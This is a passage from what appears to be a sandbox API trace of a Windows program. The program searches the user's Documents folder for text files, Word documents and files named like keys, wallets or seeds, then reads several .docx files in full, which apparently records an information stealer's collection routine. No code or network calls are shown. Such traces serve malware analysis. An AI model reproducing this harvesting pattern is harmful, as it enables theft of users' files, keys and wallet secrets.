nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0xc21, lpOverlapped=0x0) returned 1 [0216.666] ReadFile (in: hFile=0x354, lpBuffer=0x2474791, nNumberOfBytesToRead=0x3df, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2474791*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.666] ReadFile (in: hFile=0x354, lpBuffer=0x24753e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24753e8*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.872] CloseHandle (hObject=0x354) returned 1 [0216.873] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", lpFilePart=0x0) returned 0x34 [0216.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\i0w_kusvwdvhvdjkngup.docx"), fInfoLevelId=0x0, lpFileInformation=0x24b5c24 | out: lpFileInformation=0x24b5c24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6973ecc0, ftCreationTime.dwHighDateTime=0x1d7d805, ftLastAccessTime.dwLowDateTime=0xc764cfc0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xc764cfc0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x2a29)) returned 1 [0216.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.873] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0216.873] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", lpFilePart=0x0) returned 0x34 [0216.873] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", lpFilePart=0x0) returned 0x34 [0216.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\i0w_kusvwdvhvdjkngup.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6973ecc0, ftCreationTime.dwHighDateTime=0x1d7d805, ftLastAccessTime.dwLowDateTime=0xc764cfc0, ftLastAccessTime.dwHighDateTime=0x1d7e77d, ftLastWriteTime.dwLowDateTime=0xc764cfc0, ftLastWriteTime.dwHighDateTime=0x1d7e77d, nFileSizeHigh=0x0, nFileSizeLow=0x2a29)) returned 1 [0216.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.873] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx", lpFilePart=0x0) returned 0x34 [0216.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.874] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\I0W_KuSVwDvHvdJkNgup.docx" (normalized: "c:\\users\\keecfmwgj\\desktop\\i0w_kusvwdvhvdjkngup.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.874] GetFileType (hFile=0x354) returned 0x1 [0216.874] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.874] GetFileType (hFile=0x354) returned 0x1 [0216.874] ReadFile (in: hFile=0x354, lpBuffer=0x24b6f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24b6f48*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.875] ReadFile (in: hFile=0x354, lpBuffer=0x24b6f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24b6f48*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.876] ReadFile (in: hFile=0x354, lpBuffer=0x24b6f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24b6f48*, lpNumberOfBytesRead=0x36f214*=0xa29, lpOverlapped=0x0) returned 1 [0216.876] ReadFile (in: hFile=0x354, lpBuffer=0x24b6505, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24b6505*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.876] ReadFile (in: hFile=0x354, lpBuffer=0x24b6f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24b6f48*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.877] CloseHandle (hObject=0x354) returned 1 [0216.877] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0216.877] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\Documents", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\Documents") returned 0x1d [0216.877] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.877] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.877] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.878] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.878] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.878] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.878] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oraah1hNv81.docx", cAlternateFileName="ORAAH1~1.DOC")) returned 0x76a908 [0216.878] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af, dwReserved0=0x0, dwReserved1=0x0, cFileName="QIi5dKHoe7d4T0I8AD.docx", cAlternateFileName="QII5DK~1.DOC")) returned 1 [0216.878] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5de5530, ftCreationTime.dwHighDateTime=0x1d79e51, ftLastAccessTime.dwLowDateTime=0x81b1ab60, ftLastAccessTime.dwHighDateTime=0x1d7b410, ftLastWriteTime.dwLowDateTime=0x81b1ab60, ftLastWriteTime.dwHighDateTime=0x1d7b410, nFileSizeHigh=0x0, nFileSizeLow=0xbbcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="QZJHA 5.docx", cAlternateFileName="QZJHA5~1.DOC")) returned 1 [0216.878] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19210d40, ftCreationTime.dwHighDateTime=0x1d7be95, ftLastAccessTime.dwLowDateTime=0x1ce836d0, ftLastAccessTime.dwHighDateTime=0x1d7bfe7, ftLastWriteTime.dwLowDateTime=0x1ce836d0, ftLastWriteTime.dwHighDateTime=0x1d7bfe7, nFileSizeHigh=0x0, nFileSizeLow=0x17bf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ssx9X8TqMo7l4y6fOJ.docx", cAlternateFileName="SSX9X8~1.DOC")) returned 1 [0216.878] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="YJrlqSzeXnA.docx", cAlternateFileName="YJRLQS~1.DOC")) returned 1 [0216.878] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36efc8 | out: lpFindFileData=0x36efc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0216.878] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0216.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.879] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.879] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.879] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.879] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.881] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.881] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.881] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0216.881] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0216.881] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.882] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), fInfoLevelId=0x0, lpFileInformation=0x24c988c | out: lpFileInformation=0x24c988c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb)) returned 1 [0216.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.882] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.882] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0216.882] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0216.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.882] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95b26ad0, ftCreationTime.dwHighDateTime=0x1d7878f, ftLastAccessTime.dwLowDateTime=0x2be7da40, ftLastAccessTime.dwHighDateTime=0x1d793ce, ftLastWriteTime.dwLowDateTime=0x2be7da40, ftLastWriteTime.dwHighDateTime=0x1d793ce, nFileSizeHigh=0x0, nFileSizeLow=0xf6bb)) returned 1 [0216.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.882] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx", lpFilePart=0x0) returned 0x2d [0216.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.882] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Oraah1hNv81.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\oraah1hnv81.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.883] GetFileType (hFile=0x354) returned 0x1 [0216.883] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.883] GetFileType (hFile=0x354) returned 0x1 [0216.883] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.884] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.884] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.885] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.885] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.885] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.886] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.886] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.886] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.886] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.887] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.887] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.887] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.888] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.888] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.888] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x6bb, lpOverlapped=0x0) returned 1 [0216.888] ReadFile (in: hFile=0x354, lpBuffer=0x24ca1a7, nNumberOfBytesToRead=0x145, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24ca1a7*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.888] ReadFile (in: hFile=0x354, lpBuffer=0x24cab58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x24cab58*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.890] CloseHandle (hObject=0x354) returned 1 [0216.890] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0216.890] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f018) returned 1 [0216.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), fInfoLevelId=0x0, lpFileInformation=0x24fa9cc | out: lpFileInformation=0x24fa9cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af)) returned 1 [0216.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f014) returned 1 [0216.891] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x36ed80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0216.891] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0216.891] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ed4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0216.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ef8c) returned 1 [0216.891] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a1c0, ftCreationTime.dwHighDateTime=0x1d7c91f, ftLastAccessTime.dwLowDateTime=0x5dfc3490, ftLastAccessTime.dwHighDateTime=0x1d7c9a7, ftLastWriteTime.dwLowDateTime=0x5dfc3490, ftLastWriteTime.dwHighDateTime=0x1d7c9a7, nFileSizeHigh=0x0, nFileSizeLow=0x174af)) returned 1 [0216.891] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.891] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx", lpFilePart=0x0) returned 0x34 [0216.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.891] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\QIi5dKHoe7d4T0I8AD.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qii5dkhoe7d4t0i8ad.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.892] GetFileType (hFile=0x354) returned 0x1 [0216.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.892] GetFileType (hFile=0x354) returned 0x1 [0216.892] ReadFile (in: hFile=0x354, 